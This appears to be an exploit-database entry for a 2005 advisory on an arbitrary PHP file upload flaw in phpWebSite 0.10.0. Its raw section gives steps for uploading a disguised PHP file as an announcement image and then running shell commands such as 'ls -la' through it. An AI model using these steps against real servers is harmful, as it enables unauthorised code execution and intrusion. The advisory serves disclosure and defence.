header-logo
Suggest Exploit
vendor:
phpWebSite
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Arbitrary PHP File Upload
434
CWE
Product Name: phpWebSite
Affected Version From: 0.10.0
Affected Version To: 0.10.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phpwebsite:phpwebsite:0.10.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

phpWebSite Remote Arbitrary PHP File Upload Vulnerability

phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement. A remote attacker may exploit this condition to execute arbitrary PHP code in the context of the hosting web server process.

Mitigation:

Ensure that all user-supplied input is properly sanitized before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12653/info

phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement.

A remote attacker may exploit this condition to execute arbitrary PHP code in the context of the hosting web server process.

This vulnerability is reported to affect phpWebSite versions up to an including version 0.10.0. 

http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la